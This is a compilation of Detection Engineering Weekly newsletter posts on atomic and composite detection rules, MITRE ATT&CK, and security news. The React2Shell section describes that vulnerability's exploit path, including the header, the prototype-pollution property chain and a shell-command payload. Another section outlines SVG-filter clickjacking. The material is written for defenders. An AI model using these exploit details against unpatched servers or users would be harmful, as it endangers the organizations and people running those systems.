kpolley/easy-agents

This is a nice example of what I think will be a normal detection and response engineer’s setup in the next few years. Your org will operate a repository with agent setups for technology like Claude code, and it’ll contain a standardized list of MCP servers to use and agent instructions. Making it extendable to tweak or add agents and MCP servers should be as easy as another prompt and some glue work for a custom MCP.

Received — 11 January 2026 ⏭ Detection Engineering Weekly

Detection Engineering Weekly
What are Composite Detections? 7 January 2026 at 02:48

What are Composite Detections?

Detection Engineering Weekly

By: Zack Allen

7 January 2026 at 02:48

Atomic Detection rules are critical building blocks for a detection engineering function. They provide visibility into singular event or indicator-based threat activity within an environment. The rules are narrow in scope and generally lack context for the blue teamer’s environment and the threat actor performing the malicious action. For example, an atomic detection rule can inspect Administrator logon activity in a cloud environment and generate an alert whenever an Administrator logs in. This captures malicious admin compromises (high recall), but also triggers on every legitimate admin login (low precision), flooding analysts with false positives.

This tradeoff also works in the opposite direction on the precision-recall spectrum. A detection engineer can deploy an atomic rule that is so precise it becomes brittle. It may never generate an alert because the fields it tries to capture are so specific that they offer low operational value.

The Detection Engineering Field Manual is a series dedicated to sharing knowledge and my experience building, operating and scaling a detection engineering organization at a F500 tech company. Please like and subscribe if you find this series useful!

The answer to combat these types of detections is to increase the context around the attack itself. This means capturing more threat activity to group atomic detections together, as well as increasing the context of the environment to differentiate benign and malicious activity. Composite detections, also known as correlated or stateful detections, increase the context and, therefore, complexity of writing and maintaining the rule.

This field manual post covers (ha!) the pros and cons of composite detection rules and begins to explore strategies to expand context around threat activity.

Detection Engineering Interview Questions:

What is the MITRE ATT&CK?
What is a composite detection rule?
Explain a threat activity scenario where a composite detection rule helps reduce false positives?
How do composite rules increase operational complexity for a detection engineer?

MITRE ATT&CK

MITRE ATT&CK (pronounced “MY-ter AT-ack”) is the industry standard for modeling threat activity. According to their main website:

“MITRE ATT&CK® is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. The ATT&CK knowledge base is used as a foundation for the development of specific threat models and methodologies in the private sector, in government, and in the cybersecurity product and service community.”

There is no modern detection engineering and incident response without MITRE ATT&CK. It serves as a lexicon for security engineers across red and blue teams to standardize on how a specific attack occurs and the telemetry it generates.

Tactics are along the X axis and represent the stages an attacker traverses to achieve an objective, such as exfiltrating sensitive data, deploying ransomware, or causing a denial-of-service attack. Ransomware deployment is the end goal, but it requires a lot of steps to achieve that impact. For example, getting access to a victim machine, laterally moving to a domain controller, collecting secrets and cracking administrator passwords, and finally finding a way to deploy the ransomware.

The Techniques are the Y-axis under each Tactic. Techniques are the how: specific methods adversaries use within each tactic to achieve their objective. For example, Network Share Discovery under Discovery is used by attackers to find interesting files, folders and target machines connected to the current machine. They can leverage this to perform Collection of sensitive information and perform Lateral Movement to a higher privileged victim machine.

The beauty of MITRE ATT&CK is that it directly contradicts the adage “attackers only need to be right once, defenders have to be right 100% of the time.” Each technique listed above has associated telemetry, detection opportunities, and some even have threat groups that leverage the documented techniques.

What does this have to do with Composite Detections?

In my last post on Atomic Detections, I talked about how Atomic Detection rules lack context. These rules can use threat intelligence, such as malicious IP addresses, to generate alerts, but those IP addresses can be rotated, making the rule very noisy. So you wouldn’t want to write that rule unless it existed in the same window where the IP address remains malicious.

On a separate Atomic Detection rule, a detection engineer can write a rule to alert on Network Share Discovery. This is an obvious choice from my example before: the next logical step after Network Share Discovery is Lateral Movement. We want to detect that, right?

The problem here, again, becomes context. What if a legitimate process, such as a File Search or Data Backup tool, performs Network Discovery? You generate an alert, block the activity, and just killed productivity or a critical business process for one of your users. Does this mean you need to painstakingly investigate every Network Discovery alert? You could, but you would burn out, and the operational costs would be too high.

This is where Composite Detections can help, and where MITRE ATT&CK enables context via chains of events. By correlating Network Share Discovery with subsequent Lateral Movement attempts, we filter out benign activity and surface actual threats.

Composite Detections Tell a Story

Let’s continue to challenge the adage “attackers only need to be right once, defenders have to be right 100% of the time.” We know that writing one Atomic Detection rule can be noisy. So what if you write two? What if you write these rules across every single path along MITRE ATT&CK, under every Tactic? You would have high recall, but terrible precision, and a flurry of alerts that can’t discern between benign and malicious activity.

Let’s look at an example from our previous post on Atomic Detection Rules:

In this scenario, the Atomic Detection rule fires on administrator login activity. We are only looking at the event and ignoring sourceIP, timestamp, and location. These can help tell the story, but the story stops on the singular event. You could write some additional enrichment to tell the story that:

The Admin is logging in from a risky location, let’s say outside the U.S. for the sake of example
The Admin is logging in past business hours

But these enrichment points can also be part of legitimate business activity. This is where context comes into play.

Let’s say you have two other rules that capture potential threat activity of an Administrator creating a second account and attaching an Administrator policy or profile to it. It’s riskier (it’s further along the ATT&CK chain), but it lacks context. But what if you combine the threat scenarios and create a story?

Here’s the story: an Administrator account gets compromised, and an attacker runs a script to log in to your AWS portal automatically. They are smart cookies and believe in another adage, “two is one, and one is none,” and create a second account to achieve Persistence on your account. They then leverage their Administrator privileges to attach an Administrator policy. Smart, if you reset the original Administrator password, they have a backdoor back into your environment!

By combining the three scenarios via the following rule, in pseudocode:

if user contains 'admin'
AND CreateUser action is called
AND AttachUserPolicy is called and the Policy = 'Admin'
THEN alert

You’ve told your SIEM quite a compelling story to look out for, and it found it!

There are some key questions from the above rule, and they emerge from the other data I’ve omitted from my diagram:

What is a legitimate amount of time between logging on and calling CreateUser?
Is calling CreateUser then attaching an Administrator policy malicious?
Does this Admin typically CreateUser and attach policies?

These questions are what adds complexity and cost to writing and maintaining a ruleset. So, a detection engineer must weigh the cost of this complexity versus the cost of false positives from Atomic rules.

In this specific Composite rule, we used Windowing. Windowing is a technique in which we capture activity in time windows and assume that any Composite detection that captures events within that window must be the result of threat activity. The rule assumes that if an Administrator account logs in, creates a secondary account, and attaches a privileged policy to it, it must be malicious. This reduces false positives by:

Combining three Atomic rules into one rule
Creates a story where these three actions together means something malicious is happening, or requires investigation
Assumes threat actors will try to do this quickly as their access may be revoked within a few minutes

Stories increase complexity

I linked a chart in my previous post about the trade-off between context, operational cost and false-positive reduction.

In this Windowed Composite Detection Case, there are several costs that detection engineers incur:

Does my SIEM technology support Windowing?
Does the combination of these detection rules capture the threat activity that I want? For example, should I also have a separate atomic rule for CreateUser to catch persistence attempts that don’t fit the 5 minute window? This can lead to false negatives if you only rely on composite rules.
Does the window period give me the best value? If I increase it to 15 minutes, what costs do I incur on server usage, indexing and other infrastructure components?

I will say that Detection Engineers I’ve hired, worked with, and spoken with at other companies spend as much time researching cost trade-offs as they do performing pure security research. This is the Engineering component of threat detection, and to me, these types of problems are what make the field exciting. You are part security researcher, part engineer, and part data scientist!

Conclusion

Composite detections shift detection engineers’ focus to reduce false positives by creating stories of attack chains. MITRE ATT&CK is the de facto industry standard for documenting how an attacker progresses through a breach to achieve an objective. Detection engineers can use ATT&CK to build atomic and composite rules to capture threat activity.

Atomic rules lack context by design, but when combined with other atomic rules via composite detections, you can start building a story of an attack. This story is the context you want to decide on whether you should investigate an alert. This story also reduces false positives by capturing the logical progression an attacker may take in your environment, and reduces the likelihood of alerting on benign activity.

The complexity of creating and maintaining composite detections stems from technological capabilities, such as windowing, as well as the hidden costs of assumptions made by the detection engineer. For example, combining three distinct events into a composite detection may miss other alerting scenarios within those events, leading to a false negative.

In the next Field Manual post, we'll explore different alerting mechanisms for composite and atomic detections outside of windowing.

Detection Engineering Weekly
What are Atomic Detection Rules? 15 December 2025 at 15:55

What are Atomic Detection Rules?

Detection Engineering Weekly

By: Zack Allen

15 December 2025 at 15:55

In the last post, we discussed the tradeoffs in designing effective rules. Detection efficacy captures the needs of the consumer of your detection rules, because the persona can be more concerned with missing an alert (false negative) or having too many alerts that don’t matter (false positives).

Finding attacks is the core value proposition of what detection engineers do, and it’s what makes this field technically challenging. Although difficult, this work has an art and aesthetic that is hard to find anywhere else in security. This is because you aren’t solving a machine-to-machine problem, but a human-to-human problem, and the other human is unwilling to cooperate with you. To me, detection engineering and blue teaming, overall, are studies of behavior.

Detection Engineering Weekly is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

In this post, we’ll begin looking at how rules detect threat activity through atomic detections.

Detection Engineering Interview Questions:

What is the Pyramid of Pain?
What is an atomic detection rule?
Compare and contrast scenarios where an atomic detection rule can be effective or ineffective.
What is environmental context?

David Bianco’s Pyramid of Pain

Some attacks generate telemetry that is easy to identify as an attacker on your system or networks. Many attacks, however, require logic that depends on telemetry availability, environmental context, index windows of logs arriving at the SIEM, and understanding of attacker tradecraft or behavior.

Much as detection engineers must consider operational costs when writing rules, threat actors incur costs when carrying out attacks. This cost-versus-cost battle helps frame attack and defense so you can impose as much cost as possible on an attacker’s operations, so they’re in so much pain they deem a tactic or technique not worth their time. This is where the “Pyramid of Pain” by David Bianco becomes a valuable exercise for security teams.

https://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html

At its core, the Pyramid of Pain challenges defenders to focus on imposing as much pain on attackers. As you traverse the pyramid, operational cost to your efforts increases, but the amount of pain you cause to an attacker also increases. Each layer of the Pyramid represents an operational complexity for the threat actor to consider when staging an attack. The ideal state of detection is at the top: if you detect Tools executing in your environment, your detections are more robust because the order and context of the tool’s execution become irrelevant.

The best state is under “Tactics, Techniques and Procedures” (TTPs). This layer focuses on the behavioral aspect an attack. If you detect behavior of an attack, every layer below the pyramid become less relevant in your detection (for the most part), and the detection is robust enough to catch changes in Tools, Artifacts, Domains, IP addresses and hashes.

Imagine this: you write a rule that helps detect a known Command-and-control (C2) server you read from a blog post. You deploy that rule and it doesn’t find anything. Great, you aren’t compromised, and you’ll have great coverage for the future if there is a compromise.

Here’s the problem: threat actors are well aware that we find C2 servers, build rules, share with the community and blog about them. A C2 server is typically either an IP Address or a Domain. Have you ever rented a droplet on Digital Ocean, or bought a domain from Namecheap? You can spend a few dollars to rent more droplets or buy new domains. This requires minimal pain on the threat actor’s side, and defenders no longer block your new C2 server until it is discovered again.

Even worse, the IP address you wrote a rule for is now leased to a benign client, and it is now alerting on benign traffic, causing pain to you and your team.

So, how effective is your detection rule now? Not too effective! This is because detecting on a singular value, such as an IP address or a domain, is an Atomic Detection. Atomic Detections are narrowly defined rules that detect activity at a point in time with little to no context. Let’s dive into them in the next section.

Atomic Detections Lack Context

Atomic Detections are tactical in nature. They may seem precise in practice, but because they lack context from the environment and incur little pain for attackers, they become brittle and prone to false positives. As soon as an attacker changes their infrastructure or flips one bit in a new build of their malware, which changes the cryptographic hash value, your rule diminishes in quality.

Atomic Detections also exist for computer or network activity. The point here is that ignoring context in an environment, such as rules that don’t evaluate time signatures, environmental context, or regular activity, makes atomic rules risky to deploy.

Let’s look at a basic alerting example with Amazon AWS Administrator login activity.

The rule is in purple and only alerts on Log activity where the user field value is admin. The SIEM correctly identities the user field containing admin three times . The 11AM alert is a true positive: the administrator credentials were compromised. The other two are false positives, indicating normal administrative work. To make things worse, the compromised login was during normal business hours.

So how do you differentiate between the three alerts?

You differentiate them by spending incident response cycles investigating each one. Now imagine 100s or 1000s of these being generated. The atomic rule strategy doesn’t work because there is little to no context on the event.

The same thing can be said for IP-based C2 alerting.

In this example, the detection engineer wrote an atomic detection rule for a known C2 IP address. Perhaps they read a blog some time around December 10 and added it quickly to find exposure. Log 1 enters the SIEM; the rule checks the destination field and generates a true-positive alert.

Fantastic! Let’s keep the rule!

The C2 was removed by the leasing company that owns it on December 11 due to the blog post. On January 15, a content delivery network leases an IP address, and network traffic logs flow through the SIEM, triggering an alert. Each subsequent network log afterward is a false positive.

The context from both of the graphs above is under the UNUSED field in the purple box. Associated domains, timestamps and physical location are all useful fields to add into the atomic rule to increase robustness of the rule and remove false positives. It would make sense, then, to start including all of these in your detection rule. Detection engineers need to understand the relationship between detection context and cost.

Imposing cost on ourselves

As we progress the Pyramid of Pain and add context to your ruleset, the cost increases. Cost can depend on time, resources, maintenance, or the technology needed to add context, such as threat intelligence. The following graph tries to explain this causal relationship:

At the bottom left, you could deploy a rule similar to the examples above. Because the operational cost of matching on a single value is low, the context is low. And because the context is low, the risk for false positives is high. As you add context (move to the right), the cost increases, but the false-positive rate decreases.

This is why not every rule can be perfectly accurate. There is a cost-benefit tradeoff, as well as information asymmetry from attacker behavior, that detection engineers must consider. The only way a rule can catch all threat activity is to alert on every piece of activity. That seems costly!

Conclusion

Atomic detection rules generally focus on low-context events or values. They can certainly help a blue team function, such as a SOC or a Detection & Response team, and they have a place in security operations. They risk generating many noisy alerts when the detection engineer fails to account for a threat actor’s behavioral patterns.

The Pyramid of Pain and imposing cost are industry-accepted concepts that help contextualize the competing objectives of blue teamers and threat actors. Writing rules to alert on the bottom parts of the pyramid, which primarily involve threat intelligence indicators (IP addresses, domains, hash values), imposes a greater cost on defenders than on threat actors. Defenders impose more pain on threat actors by climbing The Pyramid and writing rules that detect tools and TTPs.

For the next few parts of this series, I’ll explain the different ways detection engineers can write rules to capture threat actor behavior and the associated operational complexity.

Detection Engineering Weekly is a reader-supported publication. To receive new posts and support my work, consider becoming a free or paid subscriber.

Detection Engineering Weekly
DEW #140 - SVG Filter ClickJacking, Detection Engineering "Onboarding" and React2Shell spotlight 10 December 2025 at 14:03

DEW #140 - SVG Filter ClickJacking, Detection Engineering "Onboarding" and React2Shell spotlight

Detection Engineering Weekly

By: Zack Allen

10 December 2025 at 14:03

Welcome to Issue #140 of Detection Engineering Weekly!

✍️ Musings from the life of Zack:

I’m in Paris this week after a quick personal trip to London. None of you told me that there are more people walking around in the West End than Manhattan!
I managed to get some great BJJ training in while in London, and tried cold plunging for the first time ever. Low key it’s amazing
This issue is vulnerability writeup forward. But, I’m happy for it, because I think people in blue team roles need to see and understand the inner workings of malicious, unintended code paths. IMHO it makes me a better security engineer

Primary Sponsor: Permiso Security

ITDR Playbook: Detect & Respond to Suspicious Authentication Patterns
Credential compromise now drives more than half of today’s breaches—and most teams still miss early warning signs. This Identity Threat Detection & Response Playbook breaks down the highest-value authentication anomalies and provides actionable detection and response steps your team can implement immediately. Strengthen identity defense where it matters most.
Download the Playbook

💎 Detection Engineering Gem 💎

SVG Filters - Clickjacking 2.0 by lyra

I wrote a blog about abusing Open Graph previews 7 years ago for phishing. The idea was that you could abuse how browsers render preview links to display one thing while redirecting to another. I’ve always tried to find a term or phrase to coin this style of attack. It’s not malware or phishing, but similar to IDN homograph attacks, it provides a confusing user experience for the victim. And within that confusing experience, you can socially engineer them to click into whatever malicious URL you want.

ClickFix became a huge hit for threat actors between last year and this year, and it abused this same concept. You are presented with instructions to copy and paste something into your terminal to download some piece of software or fix a bug. But by abusing how clipboard interactions work with a website, the user thinks they are copying and pasting a benign command, and they instead paste a malicious payload.

Lyra’s blog follows the same confusing user experience style, but this time, doing some fun things with SVG rendering. They got their original idea after Apple announced the Liquid Glass redesign, and wanted to recreate some of that experience in the web browser. After tinkering with some of the SVG Filter Effect primitives, they tried applying these effects over an iFrame, and whoops! It worked.

The reason this was so interesting to me is that my liquid glass effect uses the feColorMatrix and feDisplacementMap SVG filters - changing the colors of pixels, and moving them, respectively. And I could do that on a cross-origin document? - Lyra

The first demonstration was a PoC on layering these types of effects over an iframe for a sensitive one-time password code. You’d be an attacker, load the OTP frame inside an iframe, then trick the user to paste the code back into what they think is the legitimate site, but it’s an SVG element on top. They dubbed this style of attack ClickJacking.

This isn’t the most interesting part, it gets better! These <fe*> elements have some mathematical capabilities to help compute everything from masks to filters. Due to the nature of this attack, most of the logic has to occur inside the <fe*> elements, because you cannot extract pixel data from an SVG filter back into JavaScript or the DOM. So how do you create a multi-stage attack?

Well, why not make these elements functionally (not Turing) complete and create a limited-but-effective state machine inside the filters? That’s obvious, right, Zack? ←Lyra, probably, as they did this

Lyra made a logic-gate example to demonstrate this, but by applying a multi-stage filter mask to a victim iFrame, they successfully showed how they can perform this SVG ClickJacking attack within a state machine rendered solely from these <fe> elements. Here’s an ASCII art example of the QR code attack with exfiltration:

The cross-origin part worries me the most here, because they essentially figured out how to overlay and extract data from the attack without breaking CORS.

They demonstrated this attack against Google Docs and were awarded a good sum of money for doing so. Video here:

https://infosec.exchange/@rebane2001/115265287713185877

I don’t know how you’d detect this on the browser, and you could have some exfiltration-style detections to work with once the data leaves the machine. UX Confusion strikes again!

🔬 State of the Art

Why the MITRE ATT&CK Framework Actually Works by John Vester

I read a lot of blog posts introducing MITRE ATT&CK to readers. I think it’s a great first topic for folks getting into the industry, because ATT&CK is such a staple for us. My biggest feedback on these blog posts is that they aren’t really offering anything new for readers. This isn’t a bad thing, since the content shouldn’t change too much, but Vester’s blog here is comparatively different from the others I have read.

The blog starts with the typical introductory content on MITRE ATT&CK, but in the “Real-world ATT&CK” section, Vester begins describing ATT&CK as a practitioner who has been doing this for years. They do this by looking at how ATT&CK looks when overlayed with detection rules inside Sumologic.

I appreciate this approach because it feels like Vester is a senior engineer, you are onboarding to a new company, and they are giving you the experienced perspective on the whole system. ATT&CK has lots of faults and a lot of its criticism is pointing at its real-world applicability. Luckily, Vester shows where it works really well and where it doesn’t necessarily work. This type of balance is what makes ATT&CK useful; it’s a tool rather than a full-fledged solution.

Understanding the Nuances of Detection by Danny Zendejas

Maybe I’m stuck on this idea of reading blogs as if I’m onboarding to a new company, but Zendeja’s blog about Detection Nuances here is a great follow-up blog to Vester’s above.

We take a lot of time jumping straight into rules and ATT&CK, but taking time to understand the logistics of detection engineering matters just as much. For example, Zendejas laid out the general architecture for SIEM, and then introduced readers to the types of formats and standards dedicated to search languages and rules.

Understanding and navigating these formats effectively is a fundamental part of a Detection Engineer’s role. Being data agnostic should be the goal. - Zendejas

The rest of the blog contains some good content around alert precision and alerting. If you put on a proverbial “onboarding at a new job” hat, this is a great introduction for folks entering the field or seeking a fresh look at fundamental concepts.

Threat Hunting based on Tor Exit Nodes (+ KQLs queries) by Sergio Albea

The Onion Routing (Tor) network is one of those funny cases of intention versus use. The idea behind it is ethically amazing: it helps mask the source of a connection to a destination server, and it would be particularly useful for people like political dissidents in hostile countries. But, whenever there is anything good, criminals tend to follow and exploit the goodness. Except crypto, all criminals! Just kidding.

In this post, Albea provides some excellent hypotheses and use cases for threat hunters to find machines on a network connecting to the Tor network. The first case is around the use of Tor locally to connect to Tor domains. This, in my opinion, is benign behavior for the most part, but it can raise legal and ethical concerns for a company, so your acceptable use policies should address it.

The second case is rooted in a more likely intrusion scenario. Attackers have used Tor to mask their source IP addresses and credential stuff login endpoints to prevent attribution and likely legal action. Although this makes sense from a privacy perspective, it’s terrible OPSEC in other ways. By design, the Tor Network publishes its exit node IP address list because, without it, Tor clients won’t know how to route through it. So, that makes an excellent detection mechanism to find abusive sign-in attempts from those routing their malicious traffic through Tor.

They provide several KQL examples so you can follow along with their hunting queries.

How Amazon uses AI agents to anticipate and counter cyber threats by Daniel Weiss

This research piece from Amazon showcases their Autonomous Threat Analyst (ATA) environment. If you take AI out of the equation, it’s a neat setup that I haven’t really seen in other corporate environments. They created a separate rule-testing environment that mimics their production environment, which is a feat in itself.

Now to add the AI parts back: they have a multi-agent architecture where a blue-team agent creates rules, validates rule logic by querying their mimicked environment, and performs curation and deployment. The fun part here is their red-team agent. They ran a query to generate Python reverse shells for detection validation, and it generated over 30. They fed telemetry from these reverse shells into the mimicked environment and identified detection gaps to improve their ruleset.

The beauty of LLMs for detection isn’t really about accuracy, but more about scale. What I worry about with this type of scale is its comfortable nature. Over thirty types of reverse shells seem like a great dataset, but were each one validated by an expert? Will LLMs generate obscure and distracting payloads to complete their task? If we only care about coverage at scale, will these LLMs waste time on these things instead of what we see in the environment?

These are all questions for which I don’t have a good answer. But, it may not matter in the sense that if we keep driving token costs down, then scale becomes irrelevant, even if the types of attacks are obscure.

Secondary Sponsor: runZero

Join runZero’s Holiday Hackstravaganza!

Tune into runZero Hour, a monthly webcast examining new exposures & attack surface anomalies. Join us on Dec 17 for 2025’s wildest vulns, top research picks, & 2026 predictions. Plus, trivia and Hak5 gift cards!
Register Now

☣️ Threat Landscape

⚡ Emerging Threats Spotlight: React2Shell

So the big threat landscape news in the last week was the React2Shell vulnerability. The exploit is elegant and simple, but the way the exploit chain leverages React’s processing capabilities is quite complex. Whenever 10/10 CVSS CVEs like this come out, the immediate thought is oh shit, another Log4Shell. It’s even worse when the researchers name the vulnerability something similar to Log4Shell, and this was no exception.

For those unfamiliar with React, it’s one of the biggest open-source frontend frameworks for arguably the most used programming language in the world, JavaScript. You can build highly responsive, complex, and beautiful applications and hook them into any backend framework of your choice.

The specific vulnerability is a server-side prototype pollution. Every object in JavaScript inherits the base prototype Object. So, when you build object primitives in JavaScript, everything from a User to a Window can use the Object’s properties. Here’s a basic example courtesy of Claude:

A person is an object with property: name. On line 6, you can call person.toString(), but person doesn’t have a toString method. That’s because all objects in JavaScript inherit Object by default, and as you can see from Line 15-19, it’ll continue “calling” up the Object chain until it reaches something it does inherit, such as toString!

This is where things get interesting for React2Shell. If you can control the input to a JavaScript function in React, such that you can supply or override functions, you can achieve arbitrary code execution. This is the premise behind React2Shell.

My colleagues at Datadog wrote about this in an excellent post detailing the vulnerability details:

The payload is from lines 4-15. The prototype pollution to override then on line 5. The actual malicious payload is under _prefix on line 10. This is a shell execution command so, if a vulnerable React server processes this specific payload, the server will call out to a shell and write the output of id to /tmp/pwned.

React’s vulnerable codepath processes HTTP POST requests with the `Next-Action` header and attempts to deserialize the payload as a React Server Component action. During deserialization, React splits references like $1:__proto__:then on colons and traverses the property chain, inadvertently accessing Object.prototype when it hits __proto__ and boom, Object is polluted!

Why is this such a big deal?

React2Shell had the right ingredients to make it a serious vulnerability with an industry-wide response. These ingredients included a CVSS 10 score with potential remote code execution, a PoC, a website, a reference to a patch to reverse-engineer, and some hype on social media. Organizations rushed to find exposure and a patch, and some accidentally took down their global CDN network in the process. There were exploitation attempts in the wild (Greynoise has a great writeup on this). My $dayjob saw our environments get hit hard once more PoCs started to drop.

The hard part here, as Kevin Beaumont points out, is the environmental context when deploying this version of React Server Components with the Next.js router. A lot of prerequisites were required, not for the exploit itself, but for the stack that needed to be deployed, which had the vulnerable code path. And if you didn’t have any of these web servers exposed to the Internet, the urgency factor of patching diminished.

But was there as much impact as Log4Shell?

The answer is a resounding no, but with a big asterisk*. Nothing compares to Log4Shell, as it truly was a black swan event in vulnerability land. But this is the problem with emerging news around vulnerabilities. We make comparisons to make sense of the chaos, and try to use that to inform urgency. So although this turned out to be mostly fine from an impact point of view, I believe we correctly placed the right amount of urgency to do something.

It’s a net positive for an industry that has a reputation for crying wolf over the smallest things. It means we are getting smarter at identifying the prerequisites for a black swan event and being okay with it not happening, because we still protected ourselves.

Firm handshakes to all who responded within the last week!

🔗 Open Source

Bert-JanP/KustoHawk

Powershell-based incident and triage platform for Azure environments. It uses the Microsoft Graph API to query for events related to Entra, Defender and Microsoft XDR. It has pre-baked queries so you can run investigations out of the box.

xorhex/BinYars

Binary Ninja plugin to run YARA-x rules inside a binja project. This is useful for reverse engineering workflows where you want to orient your understanding of the binary based on threat intelligence baked into YARA rules.

msanft/CVE-2025-55182

Fully contained PoC environment for React2Shell. The README also has a great explanation of the vulnerability and exploit chain.

qazbnm456/awesome-cve-poc

Yet another awesome-* list, but similar to the CVE-2025-55182 repository I linked above, contains references for all kinds of PoC code and environments for testing. I’ve found these most useful for when I need to capture telemetry and write rules in an environment that doesn’t mind getting exploited ;).

Detection Engineering Weekly
DEW #139 - Detection Surface, Frontier Models are good at SecOps & THREE YEAR ANNIVERSARY! 3 December 2025 at 14:03

DEW #139 - Detection Surface, Frontier Models are good at SecOps & THREE YEAR ANNIVERSARY!

Detection Engineering Weekly

By: Zack Allen

3 December 2025 at 14:03

Welcome to Issue #139 of Detection Engineering Weekly!

It’s crazy to think that it’s been three years of doing this newsletter.

Thank you all for making this a fantastic ride. Since I like stats and insights, here are some I pulled:

15,000 subscribers as of Monday :)
138 issues in total, so not perfect, 156 straight issues, 20 weeks of downtime sounds nice to me
Two kids, one major interstate move, one grad degree and no new tattoos, though I should commemorate this somehow and get a new one :)
At least one subscriber in all 50 states in the US. California, Texas, NY, Virginia and Florida are the top 5 most-subbed states
Subscribers from 153 countries across every continent. Substack doesn’t track Antarctica :(. US, India, UK, Canada & Australia are the top 5 most-subbed countries
If you like reading Ross Haleliuk, there’s a 30% chance you are also reading me. We have the top audience overlap! Eric Capuano, Jake Creps, Chris Hughes and Francis Odum are also fantastic newsletters with high overlap
I started sponsored ad placements in September and have been booked every week since then, and 2026 is looking even crazier

This Week’s Sponsor: root

Why Detection Teams Need Minute-Level Remediation
When CVE-2025-65018 dropped last week (libpng heap buffer overflow, CVSS 7.1-9.8), the exposure window started ticking. Attackers armed with AI can weaponize CVEs within hours. Traditional remediation workflows take 2-4 weeks: triage meetings, engineering scramble, testing delays.
But here’s what detection engineers need to know: the exposure window is where attackers win. The Root team patched the critical CVE in 42 minutes across three Debian releases (Bullseye, Bookworm, Trixie), creating a fundamentally different detection posture than the same CVE unpatched for weeks. Detection strategies must account for minute-level remediation capabilities.
Learn what CVE-2025-65018 teaches us about matching attackers at AI speed and why week-level remediation cycles leave detection teams with massive blind spots.
Full Story

💎 Detection Engineering Gem 💎

Turning Visibility Into Defense: Connecting the Attack Surface to the Detection Surface by Jon Schipp

I’ve been shilling the term “Attack Surface” with the detection team here at work. I think it’s a reasonable mental model to use when you need to focus detection efforts on your inventory and telemetry sources. So, when I read this post by Schipp, I was pleased to see a similar framing of the Attack Surface problem :).

The security industry has a good idea of what an attack surface is. It even has a product category vertical dedicated to it, but the definition becomes vague when you differentiate between internal and external attack surfaces. According to Schipp, the definition should focus on the assets you need to protect, which, in general, I agree with. There is no rule without telemetry, and it’s nearly a full-time job for detection engineers to identify, track, and ship the right telemetry so we can write detections.

Schipp takes this a step further with the concept of “detection surface”. The adversarial behavior you want to detect can only be detected in a subset of the assets that you own. He lists a few reasons why:

Do you have the right technology selected to generate the right telemetry and alerts on top of the assets you own?
Are you prioritizing the correct detections to find adversarial behavior in the assets you find the most critical?
How do you find new gaps in coverage, and are you doing the exercise enough as your attack surface grows?

These questions are why the 100% MITRE coverage meme exists in our space. You may write rules that cover 100% of ATT&CK, but are they detecting the right behavior given your environment? I’d much rather look at a MITRE ATT&CK heatmap with deep coverage in two tactics, like Exfiltration and Lateral Movement, so I know the team is really focusing on specific behaviors to catch.

If you want to see a visceral physical reaction from me, throw a print-out of an ATT&CK heatmap that’s all green. I’ll probably run away screaming.

🔬 State of the Art

Evaluating AI Agents in Security Operations Part 1 and Part 2 by Eddie Conk

~ Note, I had Part 1 ready to go for this week’s issue and Conk & the cotool team posted Part 2. It’s important to read Part 1 so you can understand my analysis for their follow-up blog! ~

I loved reading this post because it shows how detection-as-code evolves beyond your ruleset into AI agents that handle everything from rule triage to investigations. Cotool researchers performed a benchmarking analysis of frontier models (GPT-5, Claude Sonnet & Gemini) against Splunk’s Botsv3 dataset. Botsv3 is a security dataset containing millions of logs from real-world attacks, along with a series of questions in a CTF-like format for analysts to practice investigations.

Benchmark exercises like this answer more than “are these models accurately performing security tasks?” LLMs are cost-prohibitive, as in, they require financial capital to use the frontier model APIs, and human capital to shape, maintain, and verify results. AI agent efficacy is detection and investigation efficacy. Understanding ahead of time which agents perform well within the constraints of your business can accelerate decision-making.

Here are some of the results pasted from the blog:

The test harness for accuracy involved taking the individual CTF questions from Botsv3 and mapping them to investigative queries. Conk and team had to remove some bias from these questions because they were built as a progressive CTF. Basically, this means that answering one CTF question unlocked the next sequential question, and that sequential question could bias the investigation.

The latest frontier models from OpenAI and Anthropic outperformed Gemini here, but I was surprised to see 65% as a leading score.

Model investigative speed now enters the equation, and Anthropic’s Opus-4.5 beat the brakes off of every other model, including Haiku and Sonnet. This is good for teams who want to tune something to be fast and accurate, which seems like a good tradeoff, and it’s off to the races, right? Well, remember, detection efficacy means cost as much as it means accuracy, and the frontrunner, Opus-4.5, costs a little over $5 per investigation versus GPT-5.1’s $1.67.

There are a few other interesting callouts in the blog around token usage, but these three axes were the most relevant for people who need to balance accuracy, speed, and cost.

The detection community needs data like this to make cost-efficacy tradeoffs for their teams. Hopefully, we can see more studies comparing models, cost, and prompt strategies, and even better, releasing bootstrapping mechanisms to run these tests on our own.

OpenSourceMalware - Community Threat Database

This is a freely available threat intelligence database for reporting and tracking malicious open-source package malware. This is especially relevant for emerging threats, such as the Shai-Hulud attack, and it’s crazy to see how many packages are submitted nearly every day. If you sign in, you can view additional analysis details of the malware submitted by researchers.

Unfortunately, there are no direct IOCs on the page, so it’s hard to pivot to hashes if you want to download them from platforms like VirusTotal. It does link to sources like osv.dev , which sometimes contain hashes, but it’d be nice to see this platform host malware samples for download.

Revisiting the Idea of the “False Positive” by Joe Slowik

This oldie-but-goodie blog by Joe Slowik on the concept of false positives in security operations really drives home the underlying issues of the label. He first frames the idea of labels like true and false positives in terms of their origins in statistics. I wrote about these labels previously, and I tried to help readers understand that their value is directly proportional to the capacity of your security operations team.

Slowik goes in the other direction in terms of their value; instead of thinking about units of work, you should think about these labels in terms of the underlying behavior and hypothesis. Analysts talk about “true benigns” in this way. You alerted on the specific behavior you wanted to alert on, but you want to investigate further to determine whether it is malicious. This breaks the pure 1-shot application of a confusion matrix and adds more work for security analysts, since we need to question our underlying assumptions about a specific detection.

Recreated flow diagram from Slowik’s post

Challenging the hypothesis behind your detections aligns well with my discussion of security operations capacity versus efficacy. Here are a few questions I would ask you during this exercise:

Are you finding the right behaviors that could indicate maliciousness?
Are you okay with these behaviors generating true benign alerts, because the idea of a false negative with that behavior is detrimental?
Can the behavior you are looking for be enriched with environmental context, such as update cycles, peak traffic, or off-hours traffic?

The core of detection engineering is challenging assumptions. I hate the adage of “defenders have to be right every time, attackers have to be right once.” Finding a singular behavior to alert on across the attack chain gives us the advantage, so we really only need to be right once. So, as you build hypotheses and detection rules, you should balance what you want to see from a detection, even if it’s true benign behavior.

Intel to Detection Outcomes by Harrison Pomeroy

